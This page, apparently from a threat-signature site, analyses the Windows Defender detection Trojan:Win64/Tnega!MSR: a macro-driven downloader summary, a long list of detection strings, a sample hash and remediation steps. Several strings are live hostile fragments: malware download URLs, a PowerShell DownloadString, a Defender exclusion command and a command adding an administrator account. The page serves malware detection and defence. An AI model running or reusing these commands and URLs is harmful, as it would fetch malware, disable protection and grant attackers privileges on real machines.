Trojan:Win64/Tnega!MSR - ThreatCheck.sh

user@threatcheck.sh ~ threat-analysis

bash

$ analyze-threat Trojan:Win64/Tnega!MSR

Trojan:Win64/Tnega!MSR - Windows Defender threat signature analysis

$ cat analysis.txt

=== THREAT ANALYSIS REPORT ===

Threat Name: Trojan:Win64/Tnega!MSR

Classification:

Type:Trojan

Platform:Win64

Family:Tnega

Detection Type:Concrete

Known malware family with identified signatures

Suffix:!MSR

High-priority threat flagged by Microsoft Security Response

Confidence:Very High

False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 64-bit Windows platform, family Tnega

Summary:

This threat is a trojan downloader, likely initiated by a malicious document macro. The macro connects to remote servers (e.g., craghoppers.icu) to download and execute a secondary payload. The malware then attempts to save files, such as 'onenote.db' or 'wsdts.db', into user AppData directories to establish persistence and evade detection.

Severity:

Critical

VDM Static Detection:

Relevant strings associated with this threat:
 - https://cdn.jsd (PEHSTR_EXT)
 - gh/i87924hgHd (PEHSTR_EXT)
 - y/bboxfu<', 'that3.e (PEHSTR_EXT)
 - CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - //smartscreentestratings2.net/ (MACROHSTR_EXT)
 - .exe (MACROHSTR_EXT)
 - https: (MACROHSTR_EXT)
 - .Run CreateObject("Scripting.FileSystemObject"). (MACROHSTR_EXT)
 - .exe" (MACROHSTR_EXT)
 - CreateObject("Scripting.FileSystemObject").FileExists(szFile) (MACROHSTR_EXT)
 - Set oNode = oXML.CreateElement("base64") (MACROHSTR_EXT)
 - = Environ("UserProfile") & "\AppData\Local\Microsoft\Notice (MACROHSTR_EXT)
 - dllPath = workDir & "\" & binName (MACROHSTR_EXT)
 - binName = "wsdts.db (MACROHSTR_EXT)
 - = ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
 - = curDocName & " .docx" (MACROHSTR_EXT)
 - workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\OneNote" (MACROHSTR_EXT)
 - dllPath = workDir & "\onenote.db" (MACROHSTR_EXT)
 - Dm = "http://craghoppers.icu/Order.jpg|||msxml2.xmlhttp (MACROHSTR_EXT)
 - Dm = "http://moveis-schuster-com.ga/Order.jpg|||msxml2.xmlhttp (MACROHSTR_EXT)
 - Set xmlHttp = CreateObject(VB) (MACROHSTR_EXT)
 - .Open "get", strURL (MACROHSTR_EXT)
 - + "objShell.Run Base64Decode(" (MACROHSTR_EXT)
 - = "C:\Windows\System32\w" + "script" + ".exe " (MACROHSTR_EXT)
 - "WScript." + "She" + "ll" (MACROHSTR_EXT)
 - + "." + "v" (MACROHSTR_EXT)
 - GetDllName = "C:\ProgramData\desktop.dat" (MACROHSTR_EXT)
 - .CreateElement("base64") (MACROHSTR_EXT)
 - ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
 - , ".") - 1) (MACROHSTR_EXT)
 - CreateObject("Word.Application") (MACROHSTR_EXT)
 - viebobpspa_autologon_admin.bat (PEHSTR_EXT)
 - autologon.exe !viebobpspa EU odeA5SvxTzsDa7kwqDq6K6Xr8Bukha -accepteula (PEHSTR_EXT)
 - net localgroup administrators eu\!viebobpspa /add (PEHSTR_EXT)
 - C:\TEMP\2890.tmp\viebobpspa_autologon_admin.bat (PEHSTR_EXT)
 - System.Runtime.InteropServices (PEHSTR_EXT)
 - System.Runtime.CompilerServices (PEHSTR_EXT)
 - System.Resources (PEHSTR_EXT)
 - CowsAndBulls.GameForm.resources (PEHSTR_EXT)
 - CowsAndBulls.HighScoresForm.resources (PEHSTR_EXT)
 - CowsAndBulls.MainMenuForm.resources (PEHSTR_EXT)
 - CowsAndBulls.Properties.Resources.resources (PEHSTR_EXT)
 - cmd.exe /c powershell.exe -windowstyle hidden Sleep 5 (PEHSTR_EXT)
 - GetCommandLineW (PEHSTR_EXT)
 - TOKEN_STEALER_CREATOR.Properties (PEHSTR_EXT)
 - ItroublveTSC\bin_copy\obj\Debug (PEHSTR_EXT)
 - 4S;/M (SNID)
 - ApplyRequest.dll (PEHSTR)
 - ScriptDDL (PEHSTR)
 - _lstStatusExec (PEHSTR)
 - _reqScript (PEHSTR)
 - ExecuteAllSteps (PEHSTR)
 - SendProgressExec (PEHSTR)
 - GerarScriptsDrop (PEHSTR)
 - GetListReplaceDll (PEHSTR)
 - lblcomputadorresponsavel (PEHSTR)
 - DgFqNyZD2NcjS7p60JGMch18mc8g (PEHSTR_EXT)
 - RESUTILS.dll (PEHSTR)
 - RPCRT4.dll (PEHSTR)
 - wsnmp32.dll (PEHSTR)
 - SOFTWARE\Borland\Delphi\RTL (PEHSTR)
 - sqlite3.dll (PEHSTR)
 - /C:\ProgramData\Avast Software\Avast\aswResp.dat (PEHSTR)
 - _acmdln (PEHSTR)
 - __p__commode (PEHSTR)
 - /uke3 (SNID)
 - 99`\, (SNID)
 - TankGame.My.Resources (PEHSTR_EXT)
 - TankGame.Game.resources (PEHSTR_EXT)
 - TankGame.MainForm.resources (PEHSTR_EXT)
 - TankGame.StartUp.resources (PEHSTR_EXT)
 - TankGame.Resources.resources (PEHSTR_EXT)
 - TankGame.MultipleBlocks.resources (PEHSTR_EXT)
 - TankGame.InGameOptions.resources (PEHSTR_EXT)
 - TankGame.QuickStart.resources (PEHSTR_EXT)
 - C:\ProgramData\Avast Software\Avast\aswResp.dat (PEHSTR_EXT)
 - SOFTWARE\Borland\Delphi\CPM (PEHSTR_EXT)
 - _acmdln (PEHSTR_EXT)
 - __p__commode (PEHSTR_EXT)
 - sqlite3.dll (PEHSTR_EXT)
 - \VersionIndependentProgID (PEHSTR_EXT)
 - DefenderCSP.dll (PEHSTR_EXT)
 - 3yD`. (SNID)
 - bcrypt.dll (PEHSTR_EXT)
 - zeeLog.txt (PEHSTR_EXT)
 - Interfaces.ShellExtension.JumpList (PEHSTR_EXT)
 - file.dat (PEHSTR_EXT)
 - ShellExecuteW (PEHSTR_EXT)
 - Task24Main.pdb (PEHSTR_EXT)
 - HttpWebResponse (PEHSTR_EXT)
 - CellManager.g.resources (PEHSTR_EXT)
 - CellManager.exe (PEHSTR_EXT)
 - aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
 - XRails.Controls (PEHSTR_EXT)
 - TwiceSlicePanel.UI (PEHSTR_EXT)
 - Client.Connection (PEHSTR_EXT)
 - \7AAAAAAAAAAAAAA (PEHSTR_EXT)
 - ppphhyf.exe (PEHSTR_EXT)
 - dKO:. (SNID)
 - Oc\p! (SNID)
 - powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath (PEHSTR_EXT)
 - report_error.php?key=125478824515ADNxu2ccbwe&msg=No-Exes-Found-To-Run (PEHSTR_EXT)
 - http://sornx.xyz (PEHSTR_EXT)
 - myip.php (PEHSTR_EXT)
 - addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=12 (PEHSTR_EXT)
 - addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=12 (PEHSTR_EXT)
 - Cadave.pdb (PEHSTR_EXT)
 - Top1Mu.Net (PEHSTR_EXT)
 - Data/Logo/System.pro (PEHSTR_EXT)
 - Release\Main.pdb (PEHSTR_EXT)
 - OhTTij5lmnomlkjst\Xuh (PEHSTR_EXT)
 - $I3\$ (PEHSTR_EXT)
 - \payloaddll\Release\cmd.pdb (PEHSTR_EXT)
 - ME_ADAudit.exe (PEHSTR_EXT)
 - https://cdn.discordapp.com/attachments/895494963515772931/895591057251762186/test_2.dll (PEHSTR_EXT)
 - D:\OneDrive\Projects\OneDriveTimer\OneDriveTimerUI\obj\Release\OneDriveTimerUI.pdb (PEHSTR_EXT)
 - OneDriveTimerUI.Properties.Resources (PEHSTR_EXT)
 - CenterToScreen (PEHSTR_EXT)
 - SetThreadExecutionState (PEHSTR_EXT)
 - @Uj/<[]t (SNID)
 - MtgKERNEL32.dll (PEHSTR_EXT)
 - DonWS2_32.dll (PEHSTR_EXT)
 - Zu8K{. (SNID)
 - www.Yanjie.com (PEHSTR_EXT)
 - http://101.35.18.254/444.exe (PEHSTR_EXT)
 - \111.exe (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - C:\ProgramData\444.exe (PEHSTR_EXT)
 - ShellExecute (PEHSTR_EXT)
 - D$,lExe (PEHSTR_EXT)
 - q</2nK*>De!'7p/V (PEHSTR_EXT)
 - JoinDomain.exe (PEHSTR_EXT)
 - Software\ASProtect\Key (PEHSTR_EXT)
 - aspr_keys.ini (PEHSTR_EXT)
 - WkBycm9qZ2VxbGloSWZlbVQlKlFdbn5/ZGJgUyMvHRpKIzwnJTN2YXx5cjYnJDYpLkQ2OkBaeHF0c3dta21BVE5Tfww= (PEHSTR_EXT)
 - powershell wget https://bit.ly/3uNrtcg -O pin.txt (PEHSTR_EXT)
 - DownloadString('https://bit.ly/3uLJ706') (PEHSTR_EXT)
 - /home/keith/builds/mingw/gcc-9.2.0-mingw32-cross-native/mingw32/libgcc (PEHSTR_EXT)
 - 3<$1<$3<$\ (PEHSTR_EXT)
 - Dr4Zaap3qgP4pRB4NWbs9NQuRWalMrMG1AUda1mSG6I5n7u1nNriGo3RF0+Z/lfgeMNzjv46nK1VAIz9QXZ+VfgNxpd (PEHSTR_EXT)
 - tOH82ARnxdnufgODepMgEFCePdFSF4aj26l6HYbXlsnhvCh/NaRIPs+LM/BZtNDSNWyzOq2I4Xdho6ao= (PEHSTR_EXT)
 - +n51hDmYO9yaWP1yiFGAdu/cEvP8ojbpxBqFHzn7xvH (PEHSTR_EXT)
 - InitializeComponent (PEHSTR_EXT)
 - quanlykho.Properties (PEHSTR_EXT)
 - <Y\k` (SNID)
 - ogd368hc.dll (PEHSTR_EXT)
 - My.MyProject.Forms (PEHSTR)
 - C:\workspace\mudfix\attach\screen_block\general\obj\Release\general.pdb (PEHSTR_EXT)
 - wmiccomputersystemgetmodelFailed (PEHSTR_EXT)
 - http://xianggrhen.com/composure/ (PEHSTR_EXT)
 - FileManager.Form01.resources (PEHSTR_EXT)
 - CSVProject.Properties (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

Known malware which is associated with this threat:

Filename: 6020ea571ee6e09a0500421823fd5292858bd763acc4089a56af414cfb0c82ae(2)

6020ea571ee6e09a0500421823fd5292858bd763acc4089a56af414cfb0c82ae

05/12/2025

→VirusTotal ↓Download Sample

Remediation Steps:

Isolate the affected system from the network. Run a full antivirus scan to remove all components of the threat. Block the identified malicious URLs and domains at the firewall. Identify and delete the initial delivery vector (e.g., malicious email/document). Reset user credentials that were used on the compromised machine.

=== END REPORT ===

$ reanalyze-threat

This analysis was last updated on 05/12/2025. Do you want to analyze it again?

$ ls available-commands/

→ cd /home

user@threatcheck.sh:~$ ▊

Trojan:Win64/Tnega!MSR - Windows Defender Threat Analysis